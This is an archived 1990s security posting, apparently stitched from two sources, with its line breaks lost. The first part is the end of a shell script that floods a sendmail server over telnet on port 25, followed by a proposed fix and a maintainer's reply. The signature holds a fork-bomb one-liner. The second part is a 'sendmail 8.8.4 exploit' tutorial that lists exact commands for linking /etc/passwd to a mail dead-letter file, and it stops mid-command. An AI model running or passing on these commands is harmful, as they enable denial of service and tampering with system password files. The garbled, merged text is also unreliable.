"echo "data"" **$PLIKecho "cat **__qniec__" **$PLIKcat $1 **$PLIKecho "__qniec__" **$PLIKecho "echo "."" **$PLIKecho "echo "quit"" **$PLIKecho "sleep $TIMEOUT" **$PLIKchmod +x $PLIKecho "OK"echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort."SENT=0while [ -f $1 ]; do $PLIK|telnet $3 25 &*/dev/null & let SENT=SENT+1 echo -ne "Sent: $SENTbbbbbbbbbbbbb" CONNECTED=`ps|grep -c "telnet $3"` if [ "$LIMIT" -le "$CONNECTED" ]; then while [ "$LIMIT" -le "$CONNECTED" ]; do sleep 1 done fi if [ "$SENT" -ge "$MAX" ]; then echo "It's just an example, sorry." echo exit 0 fidone-- EOF --Suggested fix: insert additional length limit into HELO/EHLOparameter scanning routine OR disable AllowBogusHELO (but itmay cause serious troubles). I have no 8.8.8 sources at thetime, so execuse me if it's unclear.PS:--From: Gregory Neil Shapiro *sendmail+gshapiro@sendmail.org*I was able to reproduce the header problem by lengthening the HELO stringin your script.[...]This will be fixed in sendmail 8.9.--_______________________________________________________________________Micha Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]Iterowa jest rzecz ludzk, wykonywa rekursywnie - bosk [P. Deustch]=--------- [ echo "while [ -f $0 ]; do $0 &;done" *_;. _ ] ---------=Giant Bug in Sendmail 8.8.4 (taken from hackersclub.com)*************************** sendmail8.8.4 exploit "sendmail? 'tis the bugiest program" -phriend-Ok, here's a brief and interesting explonation of this famous exploit. Thisexploit uses sendmail version 8.8.4 and it requires that you have a shellacount on the server in question. The exploit creates a link from/etc/passwd to /var/tmp/dead.letter Very simple really. Here's how itworks, below are the exact commands as you have to type them (for thetechnically challendged ones) * ln /etc/passwd /var/tmp/dead.letter * telnet target.host 25 * mail from: nonexsis...
